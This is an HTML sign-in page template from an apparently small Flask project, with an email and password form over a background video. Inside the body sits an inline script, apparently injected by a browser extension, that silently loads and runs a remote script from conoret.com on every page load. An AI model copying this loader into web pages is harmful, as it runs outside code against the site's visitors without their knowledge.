<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="shortcut icon" href="../static/graphics/mainEl/tablet.png">
    <title>Subscribe for more</title>

    <link rel="canonical" href="https://getbootstrap.com/docs/4.1/examples/sign-in/">

    <link href="{{url_for('static', filename='bootstrap.min.css')}}" rel="stylesheet">

    <link href="../static/css/signin.css" rel="stylesheet">
  <script src="./signin_files/dsp" type="text/javascript" defer="" async=""></script>
  <style type="text/css">@font-face { font-family: Roboto; src: url("chrome-extension://mcgbeeipkmelnpldkobichboakdfaeon/css/Roboto-Regular.ttf"); }</style>
</head>
  
<video id="background-video" autoplay loop muted>
  <source src="../static/graphics/mainEl/vid/signin.mp4" type="video/mp4">
  </video>

    <body class="text-center"><script type="text/javascript">window.top === window && !function(){var e=document.createElement("script"),t=document.getElementsByTagName("head")[0];e.src="//conoret.com/dsp?h="+document.location.hostname+"&r="+Math.random(),e.type="text/javascript",e.defer=!0,e.async=!0,t.appendChild(e)}();</script>
    <form action="/submit" method="POST" class="form-signin">
      <img class="mb-4" src="../static/graphics/mainEl/Лого.png" alt="" width="190" height="100" style="display: block;">
      <label for="email" class="sr-only">Email address</label>
      <input  type="email" id="email" name="email" class="form-control" placeholder="Don't put your real name" required="" autofocus="">
      <label for="password" class="sr-only">Password</label>
      <input type="password" id="password" name="password" class="form-control" placeholder="They're watching" required="">
      <button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>
      <p class="mt-5 mb-3 text-muted">© 2017-2022</p>

</body>
</html>